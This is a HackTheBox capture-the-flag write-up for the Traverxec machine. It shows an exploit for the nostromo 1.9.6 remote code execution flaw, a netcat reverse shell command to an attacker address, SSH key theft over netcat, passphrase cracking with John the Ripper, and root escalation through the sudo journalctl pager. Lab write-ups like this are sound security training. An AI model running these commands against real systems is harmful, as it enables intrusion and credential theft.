Traverxec - [HTB]

Cover Image for Traverxec - [HTB]
Marmeus
Marmeus

Introduction

Traverxec is an easy linux machine from HackTheBox where the attacker will have to exploit a vulnerability in the nostromo service. Then, will have to crack some SSH keys for becoming the user david. Finally, will have to active the journalctl pager escalating privileges as root.

Enumeration

As always, let's start finding all opened ports in the machine with nmap.

kali@kali:~/Documents/HTB/Traverxec$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.046s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
# Nmap done at Thu Jul 15 10:14:31 2021 -- 1 IP address (1 host up) scanned in 56.48 seconds

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Traverxec$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.051s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking at nostromo service there is a web named TRAVERXEC.

Traverxec web

This web page isn't usefull at all, but the nmap output proivdes us the nostromo version which has an associated vulnerability.

kali@kali:~/Documents/HTB/Traverxec$ searchsploit nostromo 1.9.6
------------------------------------------ ---------------------------------
 Exploit Title                            |  Path
------------------------------------------ ---------------------------------
nostromo 1.9.6 - Remote Code Execution    | multiple/remote/47837.py
------------------------------------------ ---------------------------------
Shellcodes: No Results

Exploitation

First of all, we need to erase the 10th line of the script in order to make it work.

 10 cve2019_16278.py

Now, we are able to obtain RCE executing the exploit.

kali@kali:~/Documents/HTB/Traverxec$ python 47837.py 10.10.10.165 80 id

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    

HTTP/1.1 200 OK
Date: Thu, 15 Jul 2021 15:23:36 GMT
Server: nostromo 1.9.6
Connection: close

uid=33(www-data) gid=33(www-data) groups=33(www-data)

In order to obtain a proper reverse shell we can execute the following command.

kali@kali:~/Documents/HTB/Traverxec$ python 47837.py 10.10.10.165 80 "nc -e /bin/sh 10.10.14.101 4444"

kali@kali:/media/sf_2_MisPostsBlog/HTB/Traverxec$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.101] from (UNKNOWN) [10.10.10.165] 38162
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation 1

Inside the nostromo's configuration folder there is a configuration file named nhttpd.conf which contains special information about the home directory.

www-data@traverxec:/var/nostromo$ cat conf/nhttpd.conf 
[...]
# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

Looking at the nostromo documentation we can understand that indise each user home folder there is a public_www folder.

Furthermore, we can travel inside the david's home direcory.

www-data@traverxec:/$ ls -la /home/     
total 12
drwxr-xr-x  3 root  root  4096 Oct 25  2019 .
drwxr-xr-x 18 root  root  4096 Oct 25  2019 ..
drwx--x--x  6 david david 4096 Jul 15 07:49 david

Finding a folder named protected-file-area with backup ssh identities.

www-data@traverxec:/home/david/public_www$ ls -la protected-file-area/
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz

After downloading it using netcat we can obtain david's identity file.

www-data@traverxec:/home/david/public_www/protected-file-area$ nc 10.10.14.101 4445 < backup-ssh-identity-files.tgz
kali@kali:~/Documents/HTB/Traverxec$ nc -nlvp 4445 > backup-ssh-identity-files.tgz
kali@kali:~/Documents/HTB/Traverxec$ tar -xvzf backup-ssh-identity-files.tgz 
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

However, we still need the passphrase for the key.

kali@kali:~/Documents/HTB/Traverxec$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': 

Nonetheless, we can obtain it through john the ripper.

kali@kali:~/Documents/HTB/Traverxec$ /usr/share/john/ssh2john.py id_rsa > sshHash.txt
kali@kali:~/Documents/HTB/Traverxec$ john sshHash.txt /usr/share/wordlists/rockyou.txt 
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hunter           (id_rsa)

Now we are able to access to the machine as david through SSH.

kali@kali:~/Documents/HTB/Traverxec$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': hunter
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Thu Jul 15 14:46:48 2021 from 10.10.14.152
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Privilege escalation 2

Inside the home folder there is another directory named bin with some scripts inside.

david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ ls bin/
server-stats.head  server-stats.sh  tac

The script server-stats.sh executes the journalctl binary as sudo.

david@traverxec:~$ cat bin/server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

Hence, if we try to execute the command outside the script we are able to execute it.

david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service 
-- Logs begin at Thu 2021-07-15 14:10:13 EDT, end at Thu 2021-07-15 17:30:23 EDT. --
Jul 15 14:53:36 traverxec su[26169]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=root
Jul 15 14:53:39 traverxec su[26169]: FAILED SU (to root) www-data on none
Jul 15 14:53:48 traverxec su[26171]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=root
Jul 15 14:53:51 traverxec su[26171]: FAILED SU (to root) www-data on none

Looking at gtfobins there is a section about how to to escalate privileges using journalctl. However, in my case the default pager didn't automatically activate so I had to trigger the pager manually. For doing so, execute the following commands.

david@traverxec:~$ stty rows 2
david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2021-07-15 14:10:13 EDT, end at Thu 2021-07-15 17:35:53 EDT. --
!/bin/bash
root@traverxec:/home/david# cd
root@traverxec:~# cat root.txt 
[CENSORED]